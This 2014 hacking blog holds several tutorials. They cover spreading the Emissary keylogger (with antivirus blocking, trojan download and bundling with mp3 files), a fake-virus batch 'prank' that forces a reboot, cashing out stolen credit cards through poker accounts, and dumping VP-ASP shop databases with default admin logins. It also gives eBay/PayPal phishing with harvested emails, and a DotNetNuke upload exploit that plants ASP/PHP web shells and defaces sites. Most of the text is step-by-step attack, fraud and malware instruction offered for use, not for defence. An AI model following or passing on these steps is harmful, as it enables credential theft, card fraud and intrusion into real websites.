Tuesday, 6 May 2014

Hack Facebook Password Using Facebook Hacking Software


   Hack Facebook password using 

     facebook hacking software



Hacking Facebook Account Password: Facebook Keylogging for Hacking Facebook

Everyday I get emails wherein my readers ask me How to Hack a Facebook Account? You as the reader are most likely reading this because you want to hack into someone’s facebook account. So in this post I have decided to uncover the real and working way to hack any facebook account. Actually there are many ways to hack someones facebook password like Phishing, Keylogging or using Hacking softwares used to hack facebook password. In this post i'm going to show you how to hack someones facebook account password using a keylogger - Emissary Keylogger.

How to Hack Facebook Password using Keylogger?

1. First of all Download Emissary Keylogger. It takees screenshots of the victim's computer and sends it to your gmail along with the logs.

2. Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from www.microsoft.com/net/. Else it won't work.

3. Extract the files using WinRar or any other zip/unzip program.

4. Open "Emissary.exe" to see something like this:



5. Now, fill in your Gmail username and password in respective fields (You can create a gmail account that you're going to use only for keylogging). Enter the email adress where you wanna receive facebook passwords. Choose a name for the server.exe file. You can set timer as you wish. This timer controls the time interval between two logs emails.

6. In the "Options" section you can see what this evil little buddy can do ;)
  • Block AV Sites: Blocks VirusScanning Websites on victim's computer
  • Add to Startup: Adds to Startup via Registry
  • Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark
  • Disable TaskManager: Disable TaskManager on victim's PC
  • Disable Regedit: Disable's Regedit on victim's PC

7. Check "Trojan Downloader" to Downloade and Execute a trojan on victim's PC. You can also create a fake error message and scare your victim, like:


8. After you're done, hit on "Build" and you will get server keylogger file created in current directory.

9. Now, to hack facebook password, you have to send this server file to victim and make him install it on his computer. You can use Binder, Crypter or Fake Hacking Software to bind this server file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge.

10. Now because this is a server.exe file you can't send it via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, Speedyshare, Ziddu.com, etc.

11. Once the victim runs our sent keylogger file on his computer, it searches for all stored passwords and send you email containing all user-ids and passwords, like:


Now you have all victim email passwords in your inbox and you can now hack victim facebook accounts easily. I have personally tested this free keylogger and found it working 100%. Enjoy Hacking.


Very Important: Do not scan these tools on VirusTotal. Use http://scanner.novirusthanks.organd also check the "Do not distribute the sample" option.


Facebook Virus Prank - Your Friends Reaction :)

         Facebook Virus Prank Full tut



In this post i'll show you an easy step by step tutorial about how to make a Facebook virus using simple commands on notepad. This will make the victims think that they have a virus when they click on an icon such as Internet Explorer or Mozilla Firefox...
This "virus" is totlly harmless and won't do any damage to your victims computer.
When a victim clicks on the icon he will get a warning message like "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!". You can change the text to whatever you want. If you have some other interesting ideas, let me know. This virus doesn't do anything to your friends pc, but to see his scared face, that's something :)...

Now let's start with the tutorial:

1) Open notepad

2) Type the following text in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."



3) Save as Internet Explorer .bat 
(or whatever you want, but be shure that the last letters are .bat)



4) Right click on Internet Explorer .bat and click Create Shortcut




5) Right click on shorcut and click Properties.



6)Click Change Icon



7) Choose Internet Explorer icon (or Mozilla Firefox, or any other icon similar to it)click OK , then click Apply



8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:




Hope you'll freak out friend(s).

If this prank was successful and there was some interesting reactions of your friends, feel free to share it with us.

How To Cash Out From Stolen Creadit Cards

How To Cash Out From Stolen Creadit Cards






in my previous post I've been showing How To Hack a Credit Card. Here i will show you how to make money with Credit Cards from EVERYWHERE!!! Now before we continue, make sure you check your equipment:

  • Online game
  • Proxy
  • Credit card
1. Online game- Your Tool to Cash out

At first you have to register on an online game site, like site where you can play poker or backgammon. It is only important that you can play with real money.

For example online games like: http://www.pokerstars.com

You need 2 accounts. One of them must be your own, and the second have to be like the Credit card user. You can make account in most online games for free.

2. Proxy

After you are done with your accounts, join your Proxy. It is nice if you use the same Proxy like your credit card comes from. (e.g. German credit card, and German proxy).

3. Credit Card

Now when you connect to the Proxy, join your faked account to play online. Then purchase Real money from the hacked or stolen Credit card. Don't use your own Credit Card, it wouldn't have any effect.

How to Cashout

Join the game with your Accounts (your faked and your real) to play. You have to click on the "Play with Real Money" Button. To play you need more then 2 players on the Table. You can make more accounts to sit with all your accounts on the table, but i use to play with some friends which know what I'm doing. Then Play.

IMPORTANT: Your real account needs some real money too, 5-10$ is enough.

Then your friends have to give up the round, so that only you and your faked account is in, like 1 on 1. Now press the "All-In" Button with your Faked Account, and with your Real Account too.

The effect: Your faked account will set all the money from the hacked/stolen Credit card, and your real account will set 5-10$. Then your faked account have to lose, like give up. Now you will take all the money and logout from the Game. Press "Cashout" to cash out your Money to your real Credit card.

How To Hack Creadit Card

              How To Hack Creadit Card

Hi there. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).


This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking 

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
Example:

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp


2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.


That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. 

Monday, 5 May 2014

Hack DNN Site With Exploit

            Hack DNN Site With Exploit

Hello everyone!!

I am going to tell about Dot net nuke exploit.I know some of you know about it but it i
s very good exploit to hack dot net sites.it is fucking exploit.you can even hack all sites hosted on same server.You can upload any file using it.


Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.


What is DNN ?


DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.


Here is step by step tutorial:

Upload random file

Code:

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,

*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,

*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,

*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob

by defualt but admin may change this and you will have a Shell directly

step 1:use this dork to find vulnerable site

Code:

inurl:home/tabid/36/language/en-US/Default.aspx

another dorks you can use

Code:

inurl:fcklinkgallery.aspx

inurl:/portals/0

step 2:now open any site like

Code:

http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx

replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

so your url will become

Code:

http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

then hit enter


and if you are lucky you will get to the database easyly


step 3:Select 3rd option[file] 

Spoiler (Click to Hide)

[Image: temp3.jpg]


step 4: inject the following java code in browser address bar

Code:

javascript:__doPostBack('ctlURL$cmdUpload','')

you will get this upload option.

step 4:Now just upload your file for example mine is z.txt.when it is uploaded we can see it in root dir.

step 5:Navigate to 

Code:

http://www.vulsite.com/portals/0/z.txt

Spoiler (Click to Hide)

[Image: temp6h.jpg]


You can see our file successfully uploaded.


method to upload shell:


Things you need:

An ASP shell

r57 or C99 Shell or anyother shell


step 4:rename your asp shell to

Code:

yourshell.asp;.jpg

and upload it.


step 5:Navigate it through 

Code:

http://www.vulsite.com/portals/0/yourshell.asp;.jpg

step 6:Now upload your php shell using upload file option marked in above image.


step 7:Navigate it through 

Code:

http://www.vulsite.com/portals/0/yourphpshell.php

Voila you have your shell.Yeye


Deface

step 8:Now replace your index.html with original index.html.Thats it.


all sites in server 

Well you can hack all sites hosted on same server.

For that follow in image and click on that you will find all sites hosted on same server.Click on any one site and Now you know what to do..